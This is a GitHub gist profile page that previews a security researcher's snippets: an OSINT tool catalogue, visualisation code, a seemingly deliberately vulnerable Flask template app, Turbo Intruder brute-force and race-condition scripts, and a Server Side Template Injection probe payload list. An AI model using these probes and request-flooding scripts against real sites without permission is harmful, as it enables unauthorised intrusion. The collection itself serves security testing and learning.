Skip to content

Instantly share code, notes, and snippets.

View adithyan-ak's full-sized avatar
:electron:
Breaking and Building Code

Adithyan AK adithyan-ak

:electron:
Breaking and Building Code
View GitHub Profile
@adithyan-ak
adithyan-ak / data.json
Created May 20, 2024 01:26
Visualize the JSON
{
"Username":{
"Username Search Engines":{
"Namechk":{
"Name":"Namechk",
"Description":"Namechk is a username and domain search engine that allows users to check the availability of a particular username or domain across various social media platforms and websites.",
"Keywords":"username, domain, search engine, availability, social media, websites, registration, brand protection",
"Input":"Username, Domain",
"Output":"Username, Email Address, Domains, Social Media Profile",
"URL":"https://namechk.com/",
import G6 from '@antv/g6';
import insertCss from 'insert-css';
// 我们用 insert-css 演示引入自定义样式
// 推荐将样式添加到自己的样式文件中
// 若拷贝官方代码,别忘了 npm install insert-css
insertCss(`
.g6-component-tooltip {
background-color: rgba(0,0,0, 0.65);
padding: 10px;
[
{
"title": "Women & Plus Polar Fleece Full Zip Up Winter Warm Jacket (Black, M)",
"description": "Features: Women Fleece Jacket, Long Sleeve Hoodies Sweatshirt,features Zip up,Solid Color,Hooded,Loose Fit,Casual Fluffy Teddy Bear Coat Outerwear for Women Ladies Female.follows the chic trends to help you be more fashionable,help keep you perfect in style. The Zipper and hooded design really does elevate the jacket to make it look classy and more interesting than a regular basic solid sweatshirt hoodies.",
"imageUrl": ["https://i5.walmartimages.com/asr/e7e0293d-4030-4abb-a0d3-6e5218f66084.b67f427d2ca98b1d0e9188a9a730585d.jpeg", "https://i5.walmartimages.com/asr/b4911bc2-2bda-4477-b7ca-e45548251597.e262df5d3e74ca486e9f1abc07ff3c22.jpeg","https://i5.walmartimages.com/asr/bbc11a0e-9a28-4b51-92c1-c70e8aacfde6.ad6fa0738176adaab291ef5c8b6f2578.jpeg"],
"price": 19.90,
"category": "clothing"
},
{
"title": "Lenovo Tab P11 Pro Gen 2",
import os, sys, time
import platform, getpass
import csv
import ccl_leveldb
import pathlib
banner = '''
_____ _ _ _ _ _
/ ____| | | | | | (_) |
| (___ | | __ _ ___| | _____ _ __ | | ___ _| |_
from flask import Flask, request, render_template_string, render_template
app = Flask(__name__)
@app.route('/')
def main():
template = '''<h2> Welcome to Super Secure Website <h2>'''
return render_template('index.html')
@app.errorhandler(404)
{
"nodes": [{
"id": "ec2a",
"name": "Web Server",
"val": 1
},
{
"id": "ec2b",
"name": "Private API",
"val": 10
@adithyan-ak
adithyan-ak / python2.sh
Created November 16, 2021 01:01
Python2 Installation
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
sudo python2 get-pip.py
# upgrade setup tools to avoid "invalid command egg_info" error
pip2 install --upgrade setuptools
# install python-dev to avoid "x86_64-linux-gnu-gcc failed..." error
sudo apt-get install python-dev
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=5,
requestsPerConnection=100,
pipeline=False
)
# regular wordlist
for line in open('C:\wordlist.txt'):
engine.queue(target.req, line.rstrip())
# Test: %s
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=30,
requestsPerConnection=100,
pipeline=False
)
# the 'gate' argument blocks the final byte of each request until openGate is invoked
@adithyan-ak
adithyan-ak / ssti.txt
Created May 15, 2021 07:46
Payload list for Server Side Template Injection
{{2*2}}[[3*3]]
{{3*3}}
{{3*'3'}}
<%= 3 * 3 %>
${6*6}
${{3*3}}
@(6+5)
#{3*3}
#{ 3 * 3 }
{{dump(app)}}